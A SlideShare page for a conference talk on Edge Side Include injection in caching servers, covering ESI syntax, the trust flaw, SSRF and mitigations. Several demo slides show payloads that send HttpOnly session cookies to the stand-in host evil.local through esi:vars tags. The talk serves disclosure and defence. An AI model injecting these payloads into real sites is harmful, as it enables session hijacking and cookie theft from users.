SlideShare a Scribd company logo

Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparent Session Hijacking

Priyanka Aash
Priyanka Aash

When caching servers and load balancers became an integral part of the Internet's infrastructure, vendors introduced what is called "Edge Side Includes" (ESI), a technology allowing malleability in caching systems. This legacy technology, still implemented in nearly all popular HTTP surrogates (caching/load balancing services), is dangerous by design and brings a yet unexplored vector for web-based attacks. The ESI language consists of a small set of instructions represented by XML tags, served by the backend application server, which are processed on the Edge servers (load balancers, reverse proxies). Due to the upstream-trusting nature of Edge servers, the ESI engine tasked to parse and execute these instructions are not able to distinguish between ESI instructions legitimately provided by the application server, and malicious instructions injected by a malicious party. Through our research, we explored the risks that may be encountered through ESI injection: We identified that ESI can be used to perform SSRF, bypass reflected XSS filters (Chrome), and silently extract cookies. Because this attack vector leverages flaws on Edge servers and not on the client-side, the ESI engine can be reliably exploited to steal all cookies, including those protected by the HttpOnly mitigation flag, allowing JavaScript-less session hijacking. Identified affected vendors include Akamai, Varnish Cache, Squid Proxy, Fastly, IBM WebSphere, Oracle WebLogic, F5, and countless language-specific solutions (NodeJS, Ruby, etc.). This presentation will start by defining ESI and visiting typical infrastructures leveraging this model. We will then delve into to the good stuff; identification and exploitation of popular ESI engines, and mitigation recommendations.

Technology
1 of 50
Download to read offline
Edge Side Include Injection Abusing Caching Servers into SSRF and Transparent Session Hijacking Louis Dion-Marcil @ldionmarcil GoSecure
Edge Side Includes (ESI) — Context ❖ New class of attack on some caching servers ❖ Discovered by reading documentation
ESI — Brief Overview
ESI — Brief Overview The Weather Website Forecast for Monday Tuesday Wednesday Montréal 27°C 23°C 31°C
ESI — Brief Overview The Weather Website Forecast for Monday Tuesday Wednesday Montréal 27°C 23°C 31°C Variable Fragments Static Fragment
ESI — Brief Overview ❖ Adds fragmentation to caching ❖ App Server send fragment markers in HTTP responses <esi:[action] attr="val" /> ❖ ESI tags are parsed by the HTTP surrogate (load balancer, proxy) ❖ Most engines require specific App Server HTTP Headers
ESI Features & Syntax — Include //esi/page-1.html: <html> <p>This is page 1!</p> <esi:include src="//api/page-2.html" /> </html> //api/page-2.html: <p>This is page 2!</p>
ESI Features & Syntax — Include $ curl -s http://esi/page-1.html <html> <p>This is page 1!</p> <p>This is page 2!</p> </html>
ESI — Include Network Flow (Cache MISS)
ESI — Include Network Flow (Cache MISS) ①/1.html
ESI — Include Network Flow (Cache MISS) ①/1.html ②/1.html
ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③
ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ESI tags processed
ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html ESI tags processed
ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html 2.html⑤ ESI tags processed
ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html 2.html⑤ ⑥ + ESI tags processed
ESI Features & Syntax — Variables <esi:vars>$(VARIABLE_NAME)</esi:vars>
ESI Features & Syntax — Variables <esi:vars>$(VARIABLE_NAME)</esi:vars> $(HTTP_USER_AGENT) → Mozilla/5.0 (X11;[…] $(QUERY_STRING) → city=Montreal&format=C $(HTTP_COOKIE) → _ga=[…]&__utma=[…]
ESI — Vulnerabilities ESI tags are sent by the application server… … Parsed by the HTTP Surrogate. How can the ESI Engine tell which tags are legitimate?
ESI — Vulnerabilities ESI tags are sent by the application server… … Parsed by the HTTP Surrogate. How can the ESI Engine tell which tags are legitimate? It can’t, and that’s a pretty big design flaw.
ESI — Injection <p> City: <?= $_GET['city'] ?> </p>
ESI — Injection <p> City: <?= $_GET['city'] ?> </p> <p> City: <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> </p>
ESI — Injection <p> City: <?= $_GET['city'] ?> </p> <p> City: <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> </p>
ESI Implementations — Apache Traffic Server ❖ Donated by Yahoo! to Apache ❖ ESI stack implemented, with bonus features ❖ Used by Yahoo, Apple
ESI Implementations — Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌
ESI Implementations — Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... or are they? <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌ <esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ✅
ESI Implementations — Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... or are they? <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌ <esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ✅ → "_ga=[…]&PHPSESSID=b9gcvscc[…]"
DEMO 1 — Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... "> <img src=" //evil.local/<esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ">
DEMO 1 — Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... "> <img src=" //evil.local/<esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ">
DEMO 1 — Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... ">
DEMO 1 — Proof of concept http://evil.local/username=attacker;session_cookie=s%3A... Internet
DEMO 1 Now we know... ❖ … we can inject ESI tags, ❖ … we can leak HTTPOnly cookies, ❖ … we don’t need JavaScript. Let’s crank the impact up a notch.
ESI Implementations — Oracle Web Cache ❖ Part of the 11g suite ❖ Usually serves WebLogic Application Servers ❖ Initial ESI specification implemented, plus features
DEMO 2 — Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/? <esi:vars>$(HTTP_COOKIE{session_cookie})</esi:vars>"); x.send(); </esi:inline>
DEMO 2 — Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/? <esi:vars>$(HTTP_COOKIE{session_cookie})</esi:vars>"); x.send(); </esi:inline>
DEMO 2 — Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/?lHKlM77VbP79hDnMX2Gg..."); x.send(); </esi:inline>
DEMO 2 — Proof of concept http://evil.local/?lHKlM77VbP79hDnMX2Gg... Internet
DEMO 2 Now we know... ❖ … we can overwrite arbitrary cache entries, ❖ … we can leak HTTPOnly cookies, ❖ … JavaScript helps, but not required.
ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set
ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" }
ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" } Invalid ESI tag!
ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" } "last_name": "<esi:include src=/page-2.html />" ❖ This is valid with Apache Traffic Server Invalid ESI tag!
SSRF with Apache Traffic Server
SSRF with Apache Traffic Server
SSRF with Apache Traffic Server
ESI — SSRF Flow ①/api/me /api/me + ESI ②/api/me ③ /server-status server-status⑤ ⑥ + ESI tags processed ④
ESI — Manual Detection (by Alex Birsan @alxbrsn) FOO<!--esi -->BAR → FOOBAR ✅ FOO<!--foo -->BAR → FOO<!--foo -->BAR ❌
ESI — Manual Detection (by Alex Birsan @alxbrsn) FOO<!--esi -->BAR → FOOBAR ✅ FOO<!--foo -->BAR → FOO<!--foo -->BAR ❌ ESI — Automatic Detection ❖ Burp ActiveScan++ ❖ Burp Upload Scanner ❖ Acunetix
ESI — Migration (by Lukas Rieder @overbryd) ❖ Cloudflare Workers https://gist.github.com/Overbryd/c070bb1fa769609d404f648c d506340f
Questions? Detailed blogpost of our prior research: https://gosecure.net/2018/04/03/beyond-xss-edge-side-include-injection/ Louis Dion-Marcil @ldionmarcil GoSecure

Recommended

XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defensesMohammed A. Imran
 
Vulnerability Assessment and Penetration Testing Report
Vulnerability Assessment and Penetration Testing Report Vulnerability Assessment and Penetration Testing Report
Vulnerability Assessment and Penetration Testing Report Rishabh Upadhyay
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 

Recommended

XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defensesMohammed A. Imran
 
Vulnerability Assessment and Penetration Testing Report
Vulnerability Assessment and Penetration Testing Report Vulnerability Assessment and Penetration Testing Report
Vulnerability Assessment and Penetration Testing Report Rishabh Upadhyay
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Broken access controls
Broken access controlsBroken access controls
Broken access controlsAkansha Kesharwani
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security HeadersIsmael Goncalves
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with MetasploitM.Syarifudin, ST, OSCP, OSWP
 
Api security-testing
Api security-testingApi security-testing
Api security-testingn|u - The Open Security Community
 
Building secure applications with keycloak
Building secure applications with keycloak Building secure applications with keycloak
Building secure applications with keycloak Abhishek Koserwal
 
Malware analysis
Malware analysisMalware analysis
Malware analysisPrakashchand Suthar
 
Xss attack
Xss attackXss attack
Xss attackManjushree Mashal
 
Ch 10: Hacking Web Servers
Ch 10: Hacking Web ServersCh 10: Hacking Web Servers
Ch 10: Hacking Web ServersSam Bowne
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Thick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxThick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxAnurag Srivastava
 
Security testing
Security testingSecurity testing
Security testingKhizra Sammad
 
Super Easy Memory Forensics
Super Easy Memory ForensicsSuper Easy Memory Forensics
Super Easy Memory ForensicsIIJ
 
Web application security & Testing
Web application security & TestingWeb application security & Testing
Web application security & TestingDeepu S Nath
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Efficient Use of indexes in MySQL
Efficient Use of indexes in MySQLEfficient Use of indexes in MySQL
Efficient Use of indexes in MySQLAleksandr Kuzminsky
 
Présentation ELK/SIEM et démo Wazuh
Présentation ELK/SIEM et démo WazuhPrésentation ELK/SIEM et démo Wazuh
Présentation ELK/SIEM et démo WazuhAurélie Henriot
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
Webpack packing it all
Webpack packing it allWebpack packing it all
Webpack packing it allCriciúma Dev
 
Packing it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to nowPacking it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to nowDerek Willian Stavis
 

More Related Content

What's hot

Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Building secure applications with keycloak
Building secure applications with keycloak Building secure applications with keycloak
Building secure applications with keycloak Abhishek Koserwal
 
Ch 10: Hacking Web Servers
Ch 10: Hacking Web ServersCh 10: Hacking Web Servers
Ch 10: Hacking Web ServersSam Bowne
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Thick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxThick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxAnurag Srivastava
 
Super Easy Memory Forensics
Super Easy Memory ForensicsSuper Easy Memory Forensics
Super Easy Memory ForensicsIIJ
 
Web application security & Testing
Web application security & TestingWeb application security & Testing
Web application security & TestingDeepu S Nath
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Efficient Use of indexes in MySQL
Efficient Use of indexes in MySQLEfficient Use of indexes in MySQL
Efficient Use of indexes in MySQLAleksandr Kuzminsky
 
Présentation ELK/SIEM et démo Wazuh
Présentation ELK/SIEM et démo WazuhPrésentation ELK/SIEM et démo Wazuh
Présentation ELK/SIEM et démo WazuhAurélie Henriot
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 

What's hot (20)

Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
Broken access controls
Broken access controlsBroken access controls
Broken access controls
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security Headers
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Building secure applications with keycloak
Building secure applications with keycloak Building secure applications with keycloak
Building secure applications with keycloak
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
Xss attack
Xss attackXss attack
Xss attack
 
Ch 10: Hacking Web Servers
Ch 10: Hacking Web ServersCh 10: Hacking Web Servers
Ch 10: Hacking Web Servers
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
Thick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxThick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptx
 
Security testing
Security testingSecurity testing
Security testing
 
Super Easy Memory Forensics
Super Easy Memory ForensicsSuper Easy Memory Forensics
Super Easy Memory Forensics
 
Web application security & Testing
Web application security & TestingWeb application security & Testing
Web application security & Testing
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Efficient Use of indexes in MySQL
Efficient Use of indexes in MySQLEfficient Use of indexes in MySQL
Efficient Use of indexes in MySQL
 
Présentation ELK/SIEM et démo Wazuh
Présentation ELK/SIEM et démo WazuhPrésentation ELK/SIEM et démo Wazuh
Présentation ELK/SIEM et démo Wazuh
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 

Similar to Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparent Session Hijacking

Webpack packing it all
Webpack packing it allWebpack packing it all
Webpack packing it allCriciúma Dev
 
Packing it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to nowPacking it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to nowDerek Willian Stavis
 
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQuery
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQueryRemedie: Building a desktop app with HTTP::Engine, SQLite and jQuery
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQueryTatsuhiko Miyagawa
 
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)Igor Bronovskyy
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
 
Make WordPress realtime.
Make WordPress realtime.Make WordPress realtime.
Make WordPress realtime.Josh Hillier
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...tdc-globalcode
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php SecurityDave Ross
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Scalalable Language for a Scalable Web
Scalalable Language for a Scalable WebScalalable Language for a Scalable Web
Scalalable Language for a Scalable WebTimothy Perrett
 
HTML5: huh, what is it good for?
HTML5: huh, what is it good for?HTML5: huh, what is it good for?
HTML5: huh, what is it good for?Remy Sharp
 
May 2010 - RestEasy
May 2010 - RestEasyMay 2010 - RestEasy
May 2010 - RestEasyJBug Italy
 
Writing RESTful web services using Node.js
Writing RESTful web services using Node.jsWriting RESTful web services using Node.js
Writing RESTful web services using Node.jsFDConf
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 

Similar to Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparent Session Hijacking (20)

Webpack packing it all
Webpack packing it allWebpack packing it all
Webpack packing it all
 
Packing it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to nowPacking it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to now
 
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQuery
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQueryRemedie: Building a desktop app with HTTP::Engine, SQLite and jQuery
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQuery
 
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
Make WordPress realtime.
Make WordPress realtime.Make WordPress realtime.
Make WordPress realtime.
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php Security
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
Nodejs.meetup
Nodejs.meetupNodejs.meetup
Nodejs.meetup
 
RESTEasy
RESTEasyRESTEasy
RESTEasy
 
Scalalable Language for a Scalable Web
Scalalable Language for a Scalable WebScalalable Language for a Scalable Web
Scalalable Language for a Scalable Web
 
HTML5: huh, what is it good for?
HTML5: huh, what is it good for?HTML5: huh, what is it good for?
HTML5: huh, what is it good for?
 
How Akamai Made ESI Testing Simpler
How Akamai Made ESI Testing SimplerHow Akamai Made ESI Testing Simpler
How Akamai Made ESI Testing Simpler
 
May 2010 - RestEasy
May 2010 - RestEasyMay 2010 - RestEasy
May 2010 - RestEasy
 
Writing RESTful web services using Node.js
Writing RESTful web services using Node.jsWriting RESTful web services using Node.js
Writing RESTful web services using Node.js
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
 
Intro to PSGI and Plack
Intro to PSGI and PlackIntro to PSGI and Plack
Intro to PSGI and Plack
 
Webpack
Webpack Webpack
Webpack
 

More from Priyanka Aash

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfPriyanka Aash
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfPriyanka Aash
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfPriyanka Aash
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfPriyanka Aash
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfPriyanka Aash
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfPriyanka Aash
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdfPriyanka Aash
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfPriyanka Aash
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfPriyanka Aash
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfPriyanka Aash
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldPriyanka Aash
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksPriyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Priyanka Aash
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsPriyanka Aash
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security GovernancePriyanka Aash
 

More from Priyanka Aash (20)

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdf
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdf
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdf
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdf
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
 
DPDP Act 2023.pdf
DPDP Act 2023.pdfDPDP Act 2023.pdf
DPDP Act 2023.pdf
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdf
 
CISOPlatform journey.pptx.pdf
